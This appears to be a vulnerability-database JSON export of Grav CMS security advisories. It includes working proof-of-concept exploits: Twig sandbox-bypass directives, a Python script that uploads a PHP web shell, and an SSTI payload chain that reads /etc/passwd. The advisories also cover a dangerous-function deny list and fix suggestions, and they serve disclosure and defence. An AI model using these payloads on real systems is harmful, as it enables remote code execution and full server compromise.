/** @var Environment */\n public $twig;\n /** @var array */\n public $twig_vars = [];\n /** @var array */\n public $twig_paths;\n /** @var string */\n public $template;\n\n // Constructor\n public function __construct(Grav $grav)\n {\n $this->grav = $grav;\n $this->twig_paths = [];\n }\n\n // Twig initialization method\n public function init()\n {\n if (null === $this->twig) {\n /** @var Config $config */\n $config = $this->grav['config'];\n /** @var UniformResourceLocator $locator */\n $locator = $this->grav['locator'];\n /** @var Language $language */\n $language = $this->grav['language'];\n\n $active_language = $language->getActive();\n ...\n }\n }\n}\n```\n\nSince the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. This allows an authenticated editor to add arbitrary functions to the Twig attribute `system.twig.safe_filters`, effectively bypassing the Grav CMS sandbox.\n\n## Proof of Concept (PoC)\nAn authenticated user with permission to edit a page (with Twig processing enabled) in the Grav CMS admin console can inject malicious template directives to execute arbitrary OS commands on the remote web server.\n\nFor example, to exploit the vulnerability and execute the prohibited `system('id')` command, bypassing the sandbox, an editor could create/edit a web page with the following template directives:\n\n```twig\n{% set arr = {'1':'system', '2':'exec'} %}\n{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_filters', arr)) }}\n{{ 'id'|system }}\n{{ 'whoami'|exec }}\n```\n\nOnce the page is saved, it can be accessed by unauthenticated users, triggering the execution of the `system('id')` command on the server hosting the vulnerable Grav CMS.\n\n## Impact\nThe vulnerability allows remote code execution on the underlying server, which could lead to full server compromise.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66299","reference_id":"","reference_type":"","scores":[{"value":"0.00154","scoring_system":"epss","scoring_elements":"0.35766","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66299"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66299","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66299"},{"reference_url":"https://github.com/advisories/GHSA-gjc5-8cfh-653x","reference_id":"GHSA-gjc5-8cfh-653x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gjc5-8cfh-653x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66299","GHSA-gjc5-8cfh-653x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t3bt-hrw2-jya3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30250?format=json","vulnerability_id":"VCID-ugn8-e63y-1fes","summary":"Grav CMS is vulnerable to Cross Site Scripting (XSS) in the page editor\nGrav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65186","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10232","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65186"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"}],"url":"https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65186","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65186"},{"reference_url":"https://github.com/advisories/GHSA-cchq-397m-q2qm","reference_id":"GHSA-cchq-397m-q2qm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cchq-397m-q2qm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872243?format=json","purl":"pkg:composer/getgrav/grav@1.7.49.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.49.1"}],"aliases":["CVE-2025-65186","GHSA-cchq-397m-q2qm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ugn8-e63y-1fes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11664?format=json","vulnerability_id":"VCID-v5ah-z3uv-fbet","summary":"Remote Code Execution by uploading a phar file using frontmatter\n### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = '<?php system($_GET[\"cmd\"]); ?>'\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27923","reference_id":"","reference_type":"","scores":[{"value":"0.05118","scoring_system":"epss","scoring_elements":"0.89986","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27923"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"}],"url":"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27923","reference_id":"CVE-2024-27923","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27923"},{"reference_url":"https://github.com/advisories/GHSA-f6g2-h7qv-3m5v","reference_id":"GHSA-f6g2-h7qv-3m5v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f6g2-h7qv-3m5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33911?format=json","purl":"pkg:composer/getgrav/grav@1.7.43","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.43"}],"aliases":["CVE-2024-27923","GHSA-f6g2-h7qv-3m5v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v5ah-z3uv-fbet"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30408?format=json","vulnerability_id":"VCID-vp4w-2f8d-vfcf","summary":"Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass\n### Summary\nA Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the `cleanDangerousTwig` method.\n\n### Important\n- First of all this vulnerability is due to weak sanitization in the method `clearDangerousTwig`, so any other class that calls it indirectly through for example `$twig->processString` to sanitize code is also vulnerable.\n\n- For this report, we will need the official Form and Admin plugin installed, also I will be chaining this with another vulnerability to allow an editor which is a user with only pages permissions to edit the process section of a form.\n\n- I made another report for the other vulnerability which is a Broken Access Control which allows a user with full permission for pages to change the process section by intercepting the request and modifying it.\n\n### Permissions Needed\n- The main case for this vulnerability is an editor which can unconditionally takeover the whole system through creating a vulnerable form.\n- Second case is as an unauthenticated user, so if the form exists already and accepts user input and puts it through `evaluate_twig`, a guest can takeover the system.\n\n### Details\nWhen we make a form with a process section and a `message` action, when the form is submitted we get to deal with `onFormProcess` in `form.php` through the `message` case:\n\n```php\n case 'message':\n $translated_string = $this->grav['language']->translate($params);\n $vars = array(\n 'form' => $form\n );\n\n /** @var Twig $twig */\n $twig = $this->grav['twig'];\n $processed_string = $twig->processString($translated_string, $vars);\n\n $form->message = $processed_string;\n break;\n```\n\nWhich takes our parameters as in our action values, like in our case the value of our `message` action and sends it to `processString` which then calls the method `cleanDangerousTwig` from `Security.php`, now here's where we find the vulnerability is caused by two things:\n\n- First of all is weak regex which doesn't account for nested function calls, which allows us to bypass this function's sanitization\n- Second issue which is the `evaluate` and `evaluate_twig` functions which are allowed, and since we can call Twig syntax from inside them, it will lead to nested function calls which we can bypass and thus execute arbitrary payloads.\n\n```php\n public static function cleanDangerousTwig(string $string): string\n {\n if ($string === '') {\n return $string;\n }\n\n $bad_twig = [\n 'twig_array_map',\n 'twig_array_filter',\n 'call_user_func',\n 'registerUndefinedFunctionCallback',\n 'undefined_functions',\n 'twig.getFunction',\n 'core.setEscaper',\n 'twig.safe_functions',\n 'read_file',\n ];\n \n // This allows for a payload like {{ evaluate(\"read_file('/etc/passwd')\") }}\n $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n return $string;\n }\n```\n\n### PoC\n\nFirst to showcase how the function handles the payload, I built a small php program that replicates the behavior of `cleanDangerousTwig`:\n\n```php\n<?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n if ($string === '') {\n return $string;\n }\n\n $bad_twig = [\n 'twig_array_map',\n 'twig_array_filter',\n 'call_user_func',\n 'registerUndefinedFunctionCallback',\n 'undefined_functions',\n 'twig.getFunction',\n 'core.setEscaper',\n 'twig.safe_functions',\n 'read_file',\n ];\n $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n\n return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig('$x')\");\n```\n\nWe can run the program with this payload:\n\n```bash\nphp ok.php \"{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('cat /etc/passwd') }}\"\n```\n\nOur payload goes through and not one malicious function is filtered:\n\n```\nevaluate_twig('{# {{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} #} {# {% set a = grav.config.set('system.twig.undefined_functions',false) %} #} {# {{ grav.twig.twig.getFunction('cat /etc/passwd') }} #}')\n```\n\nNow we know that our payload definitely works so let's try it through a custom form this time, as an editor:\n\n- Go to pages\n- Add a page and create a new form or choose an exiting one\n\nWe will be using another vulnerability I found which is a Broken Access Control vulnerability, which allows an editor with basically only pages rights to modify a form's action sections without being in expert mode ( please refer to [it's report](https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh) ), so when we go to our form and save it, we can intercept the request and inject the following payload into `data[_json][header][form]` which is the header for our form which we shouldn't normally be able to modify:\n\n```\n{\"name\":\"ssti-test 2\",\"fields\":{\"name\":{\"type\":\"text\",\"label\":\"Name\",\"required\":true}},\"buttons\":{\"submit\":{\"type\":\"submit\",\"value\":\"Submit\"}},\"process\":[]}\n```\n\nURL-encode it before sending it should look something like this:\n\n\n\n\n\nRequest sent and processed! Now when you go to our form file you can see added a process section with the value of message changed:\n\n\n\nContent of form:\n\n```\ntitle: Home\nprocess:\n markdown: true\n twig: true\nform:\n name: test\n fields:\n name:\n type: text\n label: Name\n required: true\n buttons:\n submit:\n type: submit\n value: submit\n process:\n -\n message: '{{ evaluate_twig(form.value(''name'')) }}'\n```\n\nNow in the process section, notice our message action is gonna take value from the Name input, using the following payload we will execute the command `id` on the system:\n\n```\n{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('id') }}\n```\n\nNow we can visit the page and input our payload, submit and we got command result:\n\n\n\n\n### Impact\n\nAllows an attacker to execute arbitrary commands, leading to full system compromise, including unauthorized access, data theft, privilege escalation, and disruption of services.\n\n### Recommended Fix\n\n- Blacklist both the `evaluate` and `evaluate_twig` functions.\n- We could add second check to `cleanDangerousTwig` where we would look for each malicious function no matter it's position:\n\n```php\n<?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n if ($string === '') {\n return $string;\n }\n\n $bad_twig = [\n 'twig_array_map',\n 'twig_array_filter',\n 'call_user_func',\n 'registerUndefinedFunctionCallback',\n 'undefined_functions',\n 'twig.getFunction',\n 'core.setEscaper',\n 'twig.safe_functions',\n 'read_file',\n ];\n $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n\n foreach ($bad_twig as $func) {\n $string = preg_replace('/\\b' . preg_quote($func, '/') . '(\\s*\\([^)]*\\))?\\b/i', '{# $1 #}', $string);\n }\n\n return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig('$x')\");\n```\n\nWhen we run this, the result is:\n```\nevaluate_twig('{# {{ grav.twig.twig.{# #}('system') }} #} {# {% set a = grav.config.set('system.twig.{# #}',false) %} #} {# {{ grav.twig.{# #}('cat /etc/passwd') }} #}')\n```\nYou can see we managed to stop the payload and filter out the malicious functions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66294","reference_id":"","reference_type":"","scores":[{"value":"0.37646","scoring_system":"epss","scoring_elements":"0.97271","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66294"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L